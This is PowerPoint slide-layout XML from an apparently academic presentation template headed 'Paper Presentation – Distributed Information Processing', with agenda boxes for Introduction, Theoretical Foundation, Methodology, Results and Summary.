            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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Paper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Presentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3711594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elfolie">
    <p:bg>
      <p:bgRef idx="1001">
        <a:schemeClr val="bg1"/>
      </p:bgRef>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Titel 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1687631" y="741473"/>
            <a:ext cx="9144000" cy="3175900"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
              <a:alpha val="74000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr lang="de-DE" sz="4400" baseline="0" smtClean="0">
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Textplatzhalter 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841500" y="3350745"/>
            <a:ext cx="8837613" cy="374650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rechteck 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4397070"/>
            <a:ext cx="12192000" cy="24609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79555" y="4703855"/>
            <a:ext cx="4960149" cy="1137079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Gerader Verbinder 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840833" y="3215610"/>
            <a:ext cx="8837595" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0033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431448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a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>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A7E5AA84-5DF1-4832-8019-C461FEFDDB13}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246112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Rechteck 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668592" y="1404130"/>
            <a:ext cx="864000" cy="864000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99D700">
              <a:alpha val="64706"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="190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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rechteck 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="1404130"/>
            <a:ext cx="7920992" cy="864000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
              <a:alpha val="70000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="6350">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff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r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rechteck 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669866" y="2333475"/>
            <a:ext cx="864000" cy="864000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99D700">
              <a:alpha val="64706"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="190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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rechteck 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2605866" y="2333475"/>
            <a:ext cx="7920992" cy="864000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
              <a:alpha val="70000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="6350">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff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r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Theoretical Foundation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rechteck 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669866" y="3262820"/>
            <a:ext cx="864000" cy="864000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99D700">
              <a:alpha val="64706"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="190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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rechteck 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2605866" y="3262820"/>
            <a:ext cx="7920992" cy="864000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
              <a:alpha val="70000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="6350">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff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r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Methodology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rechteck 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1665142" y="4190425"/>
            <a:ext cx="864000" cy="864000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99D700">
              <a:alpha val="64706"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="190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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rechteck 9"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2605866" y="4192165"/>
            <a:ext cx="7920992" cy="862260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
              <a:alpha val="70000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="6350">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff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r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rechteck 10"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668592" y="5121510"/>
            <a:ext cx="864000" cy="864000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99D700">
              <a:alpha val="64706"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="190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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rechteck 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="5121510"/>
            <a:ext cx="7920992" cy="864000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
              <a:alpha val="70000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="6350">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff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r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2279672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endParaRPr lang="en-US"/>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A7E5AA84-5DF1-4832-8019-C461FEFDDB13}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91638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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>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A7E5AA84-5DF1-4832-8019-C461FEFDDB13}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2003869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en-US"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Foliennummernplatzhalter 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A7E5AA84-5DF1-4832-8019-C461FEFDDB13}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2899168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Datumsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Foliennummernplatzhalter 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A7E5AA84-5DF1-4832-8019-C461FEFDDB13}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333921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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Foliennummernplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A7E5AA84-5DF1-4832-8019-C461FEFDDB13}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4707626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endParaRPr lang="en-US"/>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A7E5AA84-5DF1-4832-8019-C461FEFDDB13}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19274837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endParaRPr lang="en-US"/>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A7E5AA84-5DF1-4832-8019-C461FEFDDB13}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3092639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oliennummernplatzhalter 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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Paper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Presentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20659938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a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>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A7E5AA84-5DF1-4832-8019-C461FEFDDB13}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13039757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a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>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A7E5AA84-5DF1-4832-8019-C461FEFDDB13}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415197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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Foliennummernplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16"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Paper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Presentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="423845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4" name="Foliennummernplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rechteck 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668592" y="1404130"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rechteck 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="1350818"/>
            <a:ext cx="7920992" cy="736490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="9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endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rechteck 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669866" y="2333475"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rechteck 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="2272366"/>
            <a:ext cx="7920992" cy="736490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="9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endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
